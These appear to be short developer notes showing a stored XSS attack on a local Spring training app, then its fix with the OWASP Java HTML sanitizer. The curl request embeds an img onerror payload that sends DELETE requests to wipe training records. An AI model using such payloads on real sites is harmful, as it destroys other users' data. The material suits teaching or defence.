curl 'http://localhost:8080/api/trainings/1' \
  -X 'PUT' \
  -H 'Accept: */*' \
  -H 'Accept-Language: en-US,en;q=0.9,ro;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/json' \
  -b 'Idea-f243df4d=9ac70293-bb9c-42b0-bc04-a923ec84ff36; Idea-f243e30c=81c3502f-fe01-4dbb-a017-905bd0c8ca67; XSRF-TOKEN=7615ba06-24a3-4e84-b7cd-2d13d9af61c0; APIPATH=http://localhost:8080; JSESSIONID=3483EF9BFA9C678B10986EA425417170' \
  -H 'Origin: http://localhost:8080' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://localhost:8080/' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'X-XSRF-TOKEN: 7615ba06-24a3-4e84-b7cd-2d13d9af61c0' \
  -H 'sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw '{"name":"Spring Framework","language":"JAVA","startDate":"04-12-2025","teacherId":"1","version":2,"description":"<p><strong><u>All</u></strong> <em><img src=\"x\" onerror=\"for (let i=0;i<10;i++) $.ajax(restEndpoint + `/trainings/`+i, {method: `DELETE`})\"/><a href='https://homebank.ro'>about</a></em> <strong>Spring</strong></p>"}'


  <dependency>
      <groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
      <artifactId>owasp-java-html-sanitizer</artifactId>
      <version>20200713.1</version>
  </dependency>



PolicyFactory sanitizer = Sanitizers.FORMATTING.and(Sanitizers.BLOCKS);
dto.description = sanitizer.sanitize(dto.description);

Eu am pus:
https://drive.google.com/open?id=11KIH-oZC0dmLXD9j72gpTPh9GH93V3xY&usp=drive_fs